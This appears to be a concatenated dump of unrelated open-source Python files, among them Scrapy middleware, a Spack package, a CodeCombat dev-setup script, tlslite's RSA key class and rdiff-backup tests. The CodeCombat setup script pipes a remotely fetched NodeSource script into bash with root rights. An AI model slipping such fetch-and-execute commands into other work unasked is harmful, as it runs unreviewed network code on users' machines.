callback: A callback to execute when the method finishes.
Returns:
Response message (in case of blocking call).
"""
return stub.rpc_channel.CallMethod(
method_descriptor, rpc_controller, request,
method_descriptor.output_type._concrete_class, callback)
| bsd-3-clause |
taito/scrapy | scrapy/downloadermiddlewares/httpcompression.py | 17 | 2605 | import zlib
from scrapy.utils.gz import gunzip
from scrapy.http import Response, TextResponse
from scrapy.responsetypes import responsetypes
from scrapy.exceptions import NotConfigured
ACCEPTED_ENCODINGS = [b'gzip', b'deflate']
try:
import brotli
ACCEPTED_ENCODINGS.append(b'br')
except ImportError:
pass
class HttpCompressionMiddleware(object):
"""This middleware allows compressed (gzip, deflate) traffic to be
sent/received from web sites"""
@classmethod
def from_crawler(cls, crawler):
if not crawler.settings.getbool('COMPRESSION_ENABLED'):
raise NotConfigured
return cls()
def process_request(self, request, spider):
request.headers.setdefault('Accept-Encoding',
b",".join(ACCEPTED_ENCODINGS))
def process_response(self, request, response, spider):
if request.method == 'HEAD':
return response
if isinstance(response, Response):
content_encoding = response.headers.getlist('Content-Encoding')
if content_encoding:
encoding = content_encoding.pop()
decoded_body = self._decode(response.body, encoding.lower())
respcls = responsetypes.from_args(headers=response.headers, \
url=response.url, body=decoded_body)
kwargs = dict(cls=respcls, body=decoded_body)
if issubclass(respcls, TextResponse):
# force recalculating the encoding until we make sure the
# responsetypes guessing is reliable
kwargs['encoding'] = None
response = response.replace(**kwargs)
if not content_encoding:
del response.headers['Content-Encoding']
return response
def _decode(self, body, encoding):
if encoding == b'gzip' or encoding == b'x-gzip':
body = gunzip(body)
if encoding == b'deflate':
try:
body = zlib.decompress(body)
except zlib.error:
# ugly hack to work with raw deflate content that may
# be sent by microsoft servers. For more information, see:
# http://carsten.codimi.de/gzip.yaws/
# http://www.port80software.com/200ok/archive/2005/10/31/868.aspx
# http://www.gzip.org/zlib/zlib_faq.html#faq38
body = zlib.decompress(body, -15)
if encoding == b'br' and b'br' in ACCEPTED_ENCODINGS:
body = brotli.decompress(body)
return body
| bsd-3-clause |
TheTimmy/spack | var/spack/repos/builtin/packages/listres/package.py | 3 | 1832 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Listres(AutotoolsPackage):
"""The listres program generates a list of X resources for a widget
in an X client written using a toolkit based on libXt."""
homepage = "http://cgit.freedesktop.org/xorg/app/listres"
url = "https://www.x.org/archive/individual/app/listres-1.0.3.tar.gz"
version('1.0.3', '77cafc32e8e02cca2d4453e73e0c0e7d')
depends_on('libxaw')
depends_on('libxt')
depends_on('libxmu')
depends_on('xproto', type='build')
depends_on('[email protected]:', type='build')
depends_on('util-macros', type='build')
| lgpl-2.1 |
Eureka22/ASM_xf | PythonD/site_python/MMTK/ForceFields/BondedInteractions.py | 2 | 5390 | # This module implements classes that represent force fields
# for bonded interactions.
#
# Written by Konrad Hinsen
# last revision: 2000-2-10
#
_undocumented = 1
from ForceField import ForceField, ForceFieldData
from MMTK import Utility
from Scientific.Geometry import Vector
import Numeric
#
# The base class BondedForceField provides the common
# functionality for all bonded interactions. The derived
# classes have to deal with determining functional forms
# and parameters and providing the evaluation code
#
class BondedForceField(ForceField):
def __init__(self, name):
ForceField.__init__(self, name)
self.type = 'bonded'
def evaluatorTerms(self, universe, subset1, subset2, global_data):
data = ForceFieldData()
if subset1 is not None:
label1 = Utility.uniqueAttribute()
label2 = Utility.uniqueAttribute()
for atom in subset1.atomList():
setattr(atom, label1, None)
for atom in subset2.atomList():
setattr(atom, label2, None)
for o in universe:
for bu in o.bondedUnits():
if not hasattr(bu, 'bonds'): continue
options = {'bonds': 1, 'bond_angles': 1,
'dihedrals': 1, 'impropers': 1}
self.getOptions(bu, options)
if options['bonds']:
if subset1 is None:
for bond in bu.bonds:
self.addBondTerm(data, bond, bu, global_data)
else:
for bond in bu.bonds:
atoms = [bond.a1, bond.a2]
if _checkSubset(atoms, label1, label2):
self.addBondTerm(data, bond, bu, global_data)
if options['bond_angles']:
if subset1 is None:
for angle in bu.bonds.bondAngles():
self.addBondAngleTerm(data, angle, bu, global_data)
else:
for angle in bu.bonds.bondAngles():
atoms = [angle.a1, angle.a2, angle.ca]
if _checkSubset(atoms, label1, label2):
self.addBondAngleTerm(data, angle, bu,
global_data)
d = options['dihedrals']
i = options['impropers']
if d or i:
if subset1 is None:
for angle in bu.bonds.dihedralAngles():
if angle.improper and i:
self.addImproperTerm(data, angle, bu,
global_data)
elif not angle.improper and d:
self.addDihedralTerm(data, angle, bu,
global_data)
else:
for angle in bu.bonds.dihedralAngles():
atoms = [angle.a1, angle.a2, angle.a3, angle.a4]
if _checkSubset(atoms, label1, label2):
if angle.improper and i:
self.addImproperTerm(data, angle, bu,
global_data)
elif not angle.improper and d:
self.addDihedralTerm(data, angle, bu,
global_data)
if subset1 is not None:
for atom in subset1.atomList():
delattr(atom, label1)
for atom in subset2.atomList():
delattr(atom, label2)
global_data.add('initialized', 'bonded')
from MMTK_forcefield import HarmonicDistanceTerm, HarmonicAngleTerm, \
CosineDihedralTerm
eval_list = []
bonds = data.get('bonds')
if bonds:
import sys
main = sys.modules['__main__']
indices = Numeric.array(map(lambda b: b[:2], bonds))
parameters = Numeric.array(map(lambda b: b[2:], bonds))
## setattr(main, 'indices', indices)
## setattr(main, 'parameters', parameters)
## print parameters
eval_list.append(HarmonicDistanceTerm(universe._spec,
indices, parameters))
angles = data.get('angles')
if angles:
indices = Numeric.array(map(lambda a: a[:3], angles))
parameters = Numeric.array(map(lambda a: a[3:], angles))
eval_list.append(HarmonicAngleTerm(universe._spec,
indices, parameters))
dihedrals = data.get('dihedrals')
if dihedrals:
def _dihedral_parameters(p):
return [p[4], Numeric.cos(p[5]), Numeric.sin(p[5]), p[6]]
indices = Numeric.array(map(lambda d: d[:4], dihedrals))
parameters = Numeric.array(map(_dihedral_parameters, dihedrals))
eval_list.append(CosineDihedralTerm(universe._spec,
indices, parameters))
return eval_list
def bondedForceFields(self):
return [self]
# The following methods must be overridden by derived classes.
def addBondTerm(self, data, bond, object, global_data):
raise AttributeError
def addBondAngleTerm(self, data, angle, object, global_data):
raise AttributeError
def addDihedralTerm(self, data, dihedral, object, global_data):
raise AttributeError
def addImproperTerm(self, data, improper, object, global_data):
raise AttributeError
def evalObject(self, global_data):
raise AttributeError
# The following methods are recommended for derived classes.
# They allow to read out the force field specification, e.g. for
# interfacing to other programs.
def bonds(self, global_data):
raise AttributeError
def angles(self, global_data):
raise AttributeError
def dihedrals(self, global_data):
raise AttributeError
# Check if an energy term matches the specified atom subset
def _checkSubset(atoms, label1, label2):
s1 = 0
s2 = 0
for a in atoms:
flag = 0
if hasattr(a, label1):
s1 = 1
flag = 1
if hasattr(a, label2):
s2 = 1
flag = 1
if not flag:
return 0
return s1 and s2
| gpl-2.0 |
bkiehl/lol | scripts/devSetup/factories.py | 70 | 8066 | __author__ = u'schmatz'
import errors
import configuration
import mongo
import node
import repositoryInstaller
import ruby
import shutil
import os
import glob
import subprocess
def print_computer_information(os_name,address_width):
print(os_name + " detected, architecture: " + str(address_width) + " bit")
def constructSetup():
config = configuration.Configuration()
address_width = config.system.get_virtual_memory_address_width()
if config.system.operating_system == u"mac":
print_computer_information("Mac",address_width)
return MacSetup(config)
elif config.system.operating_system == u"win":
print_computer_information("Windows",address_width)
raise NotImplementedError("Windows is not supported at this time.")
elif config.system.operating_system == u"linux":
print_computer_information("Linux",address_width)
return LinuxSetup(config)
class SetupFactory(object):
def __init__(self,config):
self.config = config
self.mongo = mongo.MongoDB(self.config)
self.node = node.Node(self.config)
self.repoCloner = repositoryInstaller.RepositoryInstaller(self.config)
self.ruby = ruby.Ruby(self.config)
def setup(self):
mongo_version_string = ""
try:
mongo_version_string = subprocess.check_output("mongod --version",shell=True)
mongo_version_string = mongo_version_string.decode(encoding='UTF-8')
except Exception as e:
print("Mongod not found: %s"%e)
if "v2.6." not in mongo_version_string:
if mongo_version_string:
print("Had MongoDB version: %s"%mongo_version_string)
print("MongoDB not found, so installing a local copy...")
self.mongo.download_dependencies()
self.mongo.install_dependencies()
self.node.download_dependencies()
self.node.install_dependencies()
#self.repoCloner.cloneRepository()
self.repoCloner.install_node_packages()
self.ruby.install_gems()
print ("Doing initial bower install...")
bower_path = self.config.directory.root_dir + os.sep + "coco" + os.sep + "node_modules" + os.sep + ".bin" + os.sep + "bower"
subprocess.call(bower_path + " --allow-root install",shell=True,cwd=self.config.directory.root_dir + os.sep + "coco")
print("Removing temporary directories")
self.config.directory.remove_tmp_directory()
print("Changing permissions of files...")
#TODO: Make this more robust and portable(doesn't pose security risk though)
subprocess.call("chmod -R 755 " + self.config.directory.root_dir + os.sep + "coco" + os.sep + "bin",shell=True)
chown_command = "chown -R " + os.getenv("SUDO_USER") + " bower_components"
chown_directory = self.config.directory.root_dir + os.sep + "coco"
subprocess.call(chown_command,shell=True,cwd=chown_directory)
print("")
print("Done! If you want to start the server, head into coco/bin and run ")
print("1. ./coco-mongodb")
print("2. ./coco-brunch ")
print("3. ./coco-dev-server")
print("NOTE: brunch may need to be run as sudo if it doesn't work (ulimit needs to be set higher than default)")
print("")
print("Before can play any levels you must update the database. See the Setup section here:")
print("https://github.com/codecombat/codecombat/wiki/Dev-Setup:-Linux#installing-the-database")
print("")
print("Go to http://localhost:3000 to see your local CodeCombat in action!")
def cleanup(self):
self.config.directory.remove_tmp_directory()
class MacSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class WinSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class LinuxSetup(SetupFactory):
def setup(self):
self.distroSetup()
super(self.__class__, self).setup()
def detectDistro(self):
distro_checks = {
"arch": "/etc/arch-release",
"ubuntu": "/etc/lsb-release"
}
for distro, path in distro_checks.items():
if os.path.exists(path):
return(distro)
def distroSetup(self):
distro = self.detectDistro()
if distro == "ubuntu":
print("Ubuntu installation detected. Would you like to install \n"
"NodeJS and MongoDB via apt-get? [y/N]")
if raw_input().lower() in ["y", "yes"]:
print("Adding repositories for MongoDB and NodeJS...")
try:
subprocess.check_call(["apt-key", "adv",
"--keyserver",
"hkp://keyserver.ubuntu.com:80",
"--recv", "7F0CEB10"])
subprocess.check_call(["add-apt-repository",
"deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen"])
subprocess.check_call("curl -sL "
"https://deb.nodesource.com/setup"
" | bash", shell=True)
subprocess.check_call(["apt-get", "update"])
except subprocess.CalledProcessError as err:
print("Adding repositories failed. Retry, Install without"
"adding \nrepositories, Skip apt-get installation, "
"or Abort? [r/i/s/A]")
answer = raw_input().lower()
if answer in ["r", "retry"]:
return(self.distroSetup())
elif answer in ["i", "install"]:
pass
elif answer in ["s", "skip"]:
return()
else:
exit(1)
else:
try:
print("Repositories added successfully. Installing NodeJS and MongoDB.")
subprocess.check_call(["apt-get", "install",
"nodejs", "mongodb-org",
"build-essential", "-y"])
except subprocess.CalledProcessError as err:
print("Installation via apt-get failed. \nContinue "
"with manual installation, or Abort? [c/A]")
if raw_input().lower() in ["c", "continue"]:
return()
else:
exit(1)
else:
print("NodeJS and MongoDB installed successfully. "
"Starting MongoDB.")
#try:
#subprocess.check_call(["service", "mongod", "start"])
#except subprocess.CalledProcessError as err:
#print("Mongo failed to start. Aborting.")
#exit(1)
if distro == "arch":
print("Arch Linux detected. Would you like to install \n"
"NodeJS and MongoDB via pacman? [y/N]")
if raw_input().lower() in ["y", "yes"]:
try:
subprocess.check_call(["pacman", "-S",
"nodejs", "mongodb",
"--noconfirm"])
except subprocess.CalledProcessError as err:
print("Installation failed. Retry, Continue, or "
"Abort? [r/c/A]")
answer = raw_input().lower()
if answer in ["r", "retry"]:
return(self.distroSetup())
elif answer in ["c", "continue"]:
return()
else:
exit(1)
| mit |
helpmoeny/pythoncode | Python_labs/lab09/cards.py | 1 | 3991 | import random # required for shuffle method of Deck
class Card(object):
''' Suit and rank are ints, and index into suit_list and rank_list.
Value is different from rank: for example face cards are equal in value (all 10)
'''
# Use these lists to map the ints of suit and rank to nice words.
# The 'x' is a place holder so that index-2 maps to '2', etc.
suit_list = ['x','c','d','h','s']
rank_list = ['x', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10','J', 'Q', 'K']
def __init__(self, rank=0, suit=0):
''' Rank and suit must be ints. This checks that they are in the correct range.
Blank card has rank and suit set to 0.
'''
if type(suit) == int and type(rank) == int:
# only good indicies work
if suit in range(1,5) and rank in range(1,15):
self.__suit = suit
self.__rank = rank
else:
self.__suit = 0
self.__rank = 0
def get_rank(self):
return self.__rank
def get_suit(self):
return self.__suit
## These two "set" methods are for testing: turn them on for testing and
## and then turn off. These allow you to change a card's rand and suit so
## you can test situations that might occur infrequently.
##
## def set_rank(self, rank):
## self.__rank = rank
##
## def set_suit(self, suit):
## self.__suit = suit
def get_value(self):
''' Face cards return 10, the rest return their rank values. Aces are low.
'''
# ternary expression:
return self.__rank if self.__rank < 10 else 10
def equal_suit(self, other):
'''Returns True if suits are equal.'''
return self.__suit == other.__suit
def equal_rank(self, other):
'''Returns True if ranks are equal.'''
return self.__rank == other.__rank
def equal_value(self, other):
'''Returns True if values are equal.'''
return self.get_value() == other.get_value()
def __str__(self):
''' Called by print() so you can print a card, just like any other data structure.
'''
# Uses rank to index into rank_list of names; uses suite to index into suit_list of names.
return "{:s}{:s}".format((self.rank_list)[self.__rank], (self.suit_list)[self.__suit])
def __repr__(self):
''' This method is called if you simply enter a card name in the shell.
It simply calls, the same method that prints a card.
'''
return self.__str__()
class Deck(object):
''' Deck of cards, implemented as a list of card objects.
The last card in the deck (list) is the top of deck.
'''
def __init__(self):
self.__deck=[Card(rank,suit) for suit in range(1,5) for rank in range(1,14)]
def shuffle(self):
'''Shuffle the deck using a call to random.'''
random.shuffle(self.__deck)
def deal(self):
'''Return the top card from the deck (only if the deck is not empty).'''
# ternary expression
return self.__deck.pop() if len(self.__deck) else None
def cards_count(self):
'''Returns the number of cards in the deck.'''
return len(self.__deck)
def is_empty(self):
'''Returns True if the deck is empty.'''
return len(self.__deck) == 0
def __str__(self):
''' Print a deck, simple but messy!
'''
return ','.join([str(card) for card in self.__deck])
def __repr__(self):
''' Messy print deck, if you enter a deck's name in the shell.
'''
return self.__str__()
def pretty_print(self, column_max=10):
''' Column-oriented printing of a deck.
'''
for index,card in enumerate(self.__deck):
if index%column_max == 0: # at final column so print a carriage return
print()
print("{:4s}".format(card), end='')
print()
print()
| unlicense |
akrherz/dep | scripts/cscap/mlra_summary.py | 2 | 2705 | """Summarize for MLRA, somehow"""
import sys
from pandas.io.sql import read_sql
import matplotlib
matplotlib.use("agg")
import matplotlib.pyplot as plt
from pyiem.util import get_dbconn
LABELS = {
29: "CC No-Till",
30: "CS Conv w/ Cover",
31: "CS Conv",
32: "CS Plow",
33: "CS No-Till",
34: "CS No-Till Cover",
35: "CSWC No-Till",
}
def main(argv):
"""Go Main Go"""
mlra_id = int(argv[1])
pgconn = get_dbconn("idep")
fig, ax = plt.subplots(3, 7, figsize=(12, 6))
mlraxref = read_sql(
"""
select mlra_id, mlra_name from mlra
""",
pgconn,
index_col="mlra_id",
)
fig.text(
0.5,
0.96,
("CSCAP Yearly Scenario Changes for MLRA: %s [%s]")
% (mlraxref.at[mlra_id, "mlra_name"], mlra_id),
ha="center",
fontsize=16,
)
for col, scenario in enumerate(range(29, 36)):
df = read_sql(
"""
with myhucs as (
SELECT huc_12 from huc12 where scenario = 0 and mlra_id = %s
)
select r.huc_12, scenario, extract(year from valid)::int as year,
sum(avg_loss) * 4.463 as loss, sum(avg_runoff) as runoff,
sum(avg_delivery) * 4.463 as delivery
from results_by_huc12 r JOIN myhucs h on (r.huc_12 = h.huc_12)
where r.valid >= '2008-01-01' and r.valid < '2017-01-01'
and (scenario = 28 or scenario = %s)
GROUP by r.huc_12, year, scenario
""",
pgconn,
params=(mlra_id, scenario),
index_col=None,
)
gdf = df.groupby(("scenario", "year")).mean()
delta = gdf.loc[(scenario,)] - gdf.loc[(28,)]
for row, varname in enumerate(["runoff", "loss", "delivery"]):
ax[row, col].bar(
delta.index.values,
delta[varname],
color=["b" if x > 0 else "r" for x in delta[varname].values],
)
if row == 0:
ax[row, col].set_title(
"Scenario %s\n%s" % (scenario, LABELS[scenario])
)
ylabels = ["Runoff [mm]", "Loss [T/a]", "Delivery [T/a]"]
for row in range(3):
ymin = 99
ymax = -99
for col in range(7):
ylim = ax[row, col].get_ylim()
ymin = min([ylim[0], ymin])
ymax = max([ylim[1], ymax])
for col in range(7):
ax[row, col].set_ylim(ymin, ymax)
ax[row, col].grid(True)
if col > 0:
ax[row, col].set_yticklabels([])
else:
ax[row, col].set_ylabel(ylabels[row])
fig.savefig("test.png")
if __name__ == "__main__":
main(sys.argv)
| mit |
CollabQ/CollabQ | vendor/gdata/tlslite/utils/RSAKey.py | 253 | 8575 | """Abstract class for RSA."""
from cryptomath import *
class RSAKey:
"""This is an abstract base class for RSA keys.
Particular implementations of RSA keys, such as
L{OpenSSL_RSAKey.OpenSSL_RSAKey},
L{Python_RSAKey.Python_RSAKey}, and
L{PyCrypto_RSAKey.PyCrypto_RSAKey},
inherit from this.
To create or parse an RSA key, don't use one of these classes
directly. Instead, use the factory functions in
L{tlslite.utils.keyfactory}.
"""
def __init__(self, n=0, e=0):
"""Create a new RSA key.
If n and e are passed in, the new key will be initialized.
@type n: int
@param n: RSA modulus.
@type e: int
@param e: RSA public exponent.
"""
raise NotImplementedError()
def __len__(self):
"""Return the length of this key in bits.
@rtype: int
"""
return numBits(self.n)
def hasPrivateKey(self):
"""Return whether or not this key has a private component.
@rtype: bool
"""
raise NotImplementedError()
def hash(self):
"""Return the cryptoID <keyHash> value corresponding to this
key.
@rtype: str
"""
raise NotImplementedError()
def getSigningAlgorithm(self):
"""Return the cryptoID sigAlgo value corresponding to this key.
@rtype: str
"""
return "pkcs1-sha1"
def hashAndSign(self, bytes):
"""Hash and sign the passed-in bytes.
This requires the key to have a private component. It performs
a PKCS1-SHA1 signature on the passed-in data.
@type bytes: str or L{array.array} of unsigned bytes
@param bytes: The value which will be hashed and signed.
@rtype: L{array.array} of unsigned bytes.
@return: A PKCS1-SHA1 signature on the passed-in data.
"""
if not isinstance(bytes, type("")):
bytes = bytesToString(bytes)
hashBytes = stringToBytes(sha.sha(bytes).digest())
prefixedHashBytes = self._addPKCS1SHA1Prefix(hashBytes)
sigBytes = self.sign(prefixedHashBytes)
return sigBytes
def hashAndVerify(self, sigBytes, bytes):
"""Hash and verify the passed-in bytes with the signature.
This verifies a PKCS1-SHA1 signature on the passed-in data.
@type sigBytes: L{array.array} of unsigned bytes
@param sigBytes: A PKCS1-SHA1 signature.
@type bytes: str or L{array.array} of unsigned bytes
@param bytes: The value which will be hashed and verified.
@rtype: bool
@return: Whether the signature matches the passed-in data.
"""
if not isinstance(bytes, type("")):
bytes = bytesToString(bytes)
hashBytes = stringToBytes(sha.sha(bytes).digest())
prefixedHashBytes = self._addPKCS1SHA1Prefix(hashBytes)
return self.verify(sigBytes, prefixedHashBytes)
def sign(self, bytes):
"""Sign the passed-in bytes.
This requires the key to have a private component. It performs
a PKCS1 signature on the passed-in data.
@type bytes: L{array.array} of unsigned bytes
@param bytes: The value which will be signed.
@rtype: L{array.array} of unsigned bytes.
@return: A PKCS1 signature on the passed-in data.
"""
if not self.hasPrivateKey():
raise AssertionError()
paddedBytes = self._addPKCS1Padding(bytes, 1)
m = bytesToNumber(paddedBytes)
if m >= self.n:
raise ValueError()
c = self._rawPrivateKeyOp(m)
sigBytes = numberToBytes(c)
return sigBytes
def verify(self, sigBytes, bytes):
"""Verify the passed-in bytes with the signature.
This verifies a PKCS1 signature on the passed-in data.
@type sigBytes: L{array.array} of unsigned bytes
@param sigBytes: A PKCS1 signature.
@type bytes: L{array.array} of unsigned bytes
@param bytes: The value which will be verified.
@rtype: bool
@return: Whether the signature matches the passed-in data.
"""
paddedBytes = self._addPKCS1Padding(bytes, 1)
c = bytesToNumber(sigBytes)
if c >= self.n:
return False
m = self._rawPublicKeyOp(c)
checkBytes = numberToBytes(m)
return checkBytes == paddedBytes
def encrypt(self, bytes):
"""Encrypt the passed-in bytes.
This performs PKCS1 encryption of the passed-in data.
@type bytes: L{array.array} of unsigned bytes
@param bytes: The value which will be encrypted.
@rtype: L{array.array} of unsigned bytes.
@return: A PKCS1 encryption of the passed-in data.
"""
paddedBytes = self._addPKCS1Padding(bytes, 2)
m = bytesToNumber(paddedBytes)
if m >= self.n:
raise ValueError()
c = self._rawPublicKeyOp(m)
encBytes = numberToBytes(c)
return encBytes
def decrypt(self, encBytes):
"""Decrypt the passed-in bytes.
This requires the key to have a private component. It performs
PKCS1 decryption of the passed-in data.
@type encBytes: L{array.array} of unsigned bytes
@param encBytes: The value which will be decrypted.
@rtype: L{array.array} of unsigned bytes or None.
@return: A PKCS1 decryption of the passed-in data or None if
the data is not properly formatted.
"""
if not self.hasPrivateKey():
raise AssertionError()
c = bytesToNumber(encBytes)
if c >= self.n:
return None
m = self._rawPrivateKeyOp(c)
decBytes = numberToBytes(m)
if (len(decBytes) != numBytes(self.n)-1): #Check first byte
return None
if decBytes[0] != 2: #Check second byte
return None
for x in range(len(decBytes)-1): #Scan through for zero separator
if decBytes[x]== 0:
break
else:
return None
return decBytes[x+1:] #Return everything after the separator
def _rawPrivateKeyOp(self, m):
raise NotImplementedError()
def _rawPublicKeyOp(self, c):
raise NotImplementedError()
def acceptsPassword(self):
"""Return True if the write() method accepts a password for use
in encrypting the private key.
@rtype: bool
"""
raise NotImplementedError()
def write(self, password=None):
"""Return a string containing the key.
@rtype: str
@return: A string describing the key, in whichever format (PEM
or XML) is native to the implementation.
"""
raise NotImplementedError()
def writeXMLPublicKey(self, indent=''):
"""Return a string containing the key.
@rtype: str
@return: A string describing the public key, in XML format.
"""
return Python_RSAKey(self.n, self.e).write(indent)
def generate(bits):
"""Generate a new key with the specified bit length.
@rtype: L{tlslite.utils.RSAKey.RSAKey}
"""
raise NotImplementedError()
generate = staticmethod(generate)
# **************************************************************************
# Helper Functions for RSA Keys
# **************************************************************************
def _addPKCS1SHA1Prefix(self, bytes):
prefixBytes = createByteArraySequence(\
[48,33,48,9,6,5,43,14,3,2,26,5,0,4,20])
prefixedBytes = prefixBytes + bytes
return prefixedBytes
def _addPKCS1Padding(self, bytes, blockType):
padLength = (numBytes(self.n) - (len(bytes)+3))
if blockType == 1: #Signature padding
pad = [0xFF] * padLength
elif blockType == 2: #Encryption padding
pad = createByteArraySequence([])
while len(pad) < padLength:
padBytes = getRandomBytes(padLength * 2)
pad = [b for b in padBytes if b != 0]
pad = pad[:padLength]
else:
raise AssertionError()
#NOTE: To be proper, we should add [0,blockType]. However,
#the zero is lost when the returned padding is converted
#to a number, so we don't even bother with it. Also,
#adding it would cause a misalignment in verify()
padding = createByteArraySequence([blockType] + pad + [0])
paddedBytes = padding + bytes
return paddedBytes
| apache-2.0 |
makinacorpus/rdiff-backup | testing/connectiontest.py | 4 | 6912 | import unittest, types, tempfile, os, sys
from commontest import *
from rdiff_backup.connection import *
from rdiff_backup import Globals, rpath, FilenameMapping
class LocalConnectionTest(unittest.TestCase):
"""Test the dummy connection"""
lc = Globals.local_connection
def testGetAttrs(self):
"""Test getting of various attributes"""
assert type(self.lc.LocalConnection) is types.ClassType
try: self.lc.asotnuhaoseu
except (NameError, KeyError): pass
else: unittest.fail("NameError or KeyError should be raised")
def testSetattrs(self):
"""Test setting of global attributes"""
self.lc.x = 5
assert self.lc.x == 5
self.lc.x = 7
assert self.lc.x == 7
def testDelattrs(self):
"""Testing deletion of attributes"""
self.lc.x = 5
del self.lc.x
try: self.lc.x
except (NameError, KeyError): pass
else: unittest.fail("No exception raised")
def testReval(self):
"""Test string evaluation"""
assert self.lc.reval("pow", 2, 3) == 8
class LowLevelPipeConnectionTest(unittest.TestCase):
"""Test LLPC class"""
objs = ["Hello", ("Tuple", "of", "strings"),
[1, 2, 3, 4], 53.34235]
excts = [TypeError("te"), NameError("ne"), os.error("oe")]
filename = tempfile.mktemp()
def testObjects(self):
"""Try moving objects across connection"""
outpipe = open(self.filename, "w")
LLPC = LowLevelPipeConnection(None, outpipe)
for obj in self.objs: LLPC._putobj(obj, 3)
outpipe.close()
inpipe = open(self.filename, "r")
LLPC.inpipe = inpipe
for obj in self.objs:
gotten = LLPC._get()
assert gotten == (3, obj), gotten
inpipe.close
os.unlink(self.filename)
def testBuf(self):
"""Try moving a buffer"""
outpipe = open(self.filename, "w")
LLPC = LowLevelPipeConnection(None, outpipe)
inbuf = open("testfiles/various_file_types/regular_file", "r").read()
LLPC._putbuf(inbuf, 234)
outpipe.close()
inpipe = open(self.filename, "r")
LLPC.inpipe = inpipe
assert (234, inbuf) == LLPC._get()
inpipe.close()
os.unlink(self.filename)
def testSendingExceptions(self):
"""Exceptions should also be sent down pipe well"""
outpipe = open(self.filename, "w")
LLPC = LowLevelPipeConnection(None, outpipe)
for exception in self.excts: LLPC._putobj(exception, 0)
outpipe.close()
inpipe = open(self.filename, "r")
LLPC.inpipe = inpipe
for exception in self.excts:
incoming_exception = LLPC._get()
assert isinstance(incoming_exception[1], exception.__class__)
inpipe.close()
os.unlink(self.filename)
class PipeConnectionTest(unittest.TestCase):
"""Test Pipe connection"""
regfilename = "testfiles/various_file_types/regular_file"
def setUp(self):
"""Must start a server for this"""
stdin, stdout = os.popen2("python ./server.py "+SourceDir)
self.conn = PipeConnection(stdout, stdin)
Globals.security_level = "override"
#self.conn.Log.setverbosity(9)
#Log.setverbosity(9)
def testBasic(self):
"""Test some basic pipe functions"""
assert self.conn.ord("a") == 97
assert self.conn.pow(2,3) == 8
assert self.conn.reval("ord", "a") == 97
def testModules(self):
"""Test module emulation"""
assert type(self.conn.tempfile.mktemp()) is types.StringType
assert self.conn.os.path.join("a", "b") == "a/b"
rp1 = rpath.RPath(self.conn, self.regfilename)
assert rp1.isreg()
def testVirtualFiles(self):
"""Testing virtual files"""
tempout = self.conn.open("testfiles/tempout", "w")
assert isinstance(tempout, VirtualFile)
regfilefp = open(self.regfilename, "r")
rpath.copyfileobj(regfilefp, tempout)
tempout.close()
regfilefp.close()
tempoutlocal = open("testfiles/tempout", "r")
regfilefp = open(self.regfilename, "r")
assert rpath.cmpfileobj(regfilefp, tempoutlocal)
tempoutlocal.close()
regfilefp.close()
os.unlink("testfiles/tempout")
assert rpath.cmpfileobj(self.conn.open(self.regfilename, "r"),
open(self.regfilename, "r"))
def testString(self):
"""Test transmitting strings"""
assert "32" == self.conn.str(32)
assert 32 == self.conn.int("32")
def testIterators(self):
"""Test transmission of iterators"""
i = iter([5, 10, 15]*100)
assert self.conn.hasattr(i, "next")
ret_val = self.conn.reval("lambda i: i.next()*i.next()", i)
assert ret_val == 50, ret_val
def testRPaths(self):
"""Test transmission of rpaths"""
rp = rpath.RPath(self.conn,
"testfiles/various_file_types/regular_file")
assert self.conn.reval("lambda rp: rp.data", rp) == rp.data
assert self.conn.reval("lambda rp: rp.conn is Globals.local_connection", rp)
def testQuotedRPaths(self):
"""Test transmission of quoted rpaths"""
qrp = FilenameMapping.QuotedRPath(self.conn,
"testfiles/various_file_types/regular_file")
assert self.conn.reval("lambda qrp: qrp.data", qrp) == qrp.data
assert qrp.isreg(), qrp
qrp_class_str = self.conn.reval("lambda qrp: str(qrp.__class__)", qrp)
assert qrp_class_str.find("QuotedRPath") > -1, qrp_class_str
def testExceptions(self):
"""Test exceptional results"""
self.assertRaises(os.error, self.conn.os.lstat,
"asoeut haosetnuhaoseu tn")
self.assertRaises(SyntaxError, self.conn.reval,
"aoetnsu aoehtnsu")
assert self.conn.pow(2,3) == 8
def tearDown(self):
"""Bring down connection"""
self.conn.quit()
class RedirectedConnectionTest(unittest.TestCase):
"""Test routing and redirection"""
def setUp(self):
"""Must start two servers for this"""
#Log.setverbosity(9)
self.conna = SetConnections.init_connection("python ./server.py " +
SourceDir)
self.connb = SetConnections.init_connection("python ./server.py " +
SourceDir)
def testBasic(self):
"""Test basic operations with redirection"""
self.conna.Globals.set("tmp_val", 1)
self.connb.Globals.set("tmp_val", 2)
assert self.conna.Globals.get("tmp_val") == 1
assert self.connb.Globals.get("tmp_val") == 2
self.conna.Globals.set("tmp_connb", self.connb)
self.connb.Globals.set("tmp_conna", self.conna)
assert self.conna.Globals.get("tmp_connb") is self.connb
assert self.connb.Globals.get("tmp_conna") is self.conna
val = self.conna.reval("Globals.get('tmp_connb').Globals.get",
"tmp_val")
assert val == 2, val
val = self.connb.reval("Globals.get('tmp_conna').Globals.get",
"tmp_val")
assert val == 1, val
assert self.conna.reval("Globals.get('tmp_connb').pow", 2, 3) == 8
self.conna.reval("Globals.tmp_connb.reval",
"Globals.tmp_conna.Globals.set", "tmp_marker", 5)
assert self.conna.Globals.get("tmp_marker") == 5
def testRpaths(self):
"""Test moving rpaths back and forth across connections"""
rp = rpath.RPath(self.conna, "foo")
self.connb.Globals.set("tmp_rpath", rp)
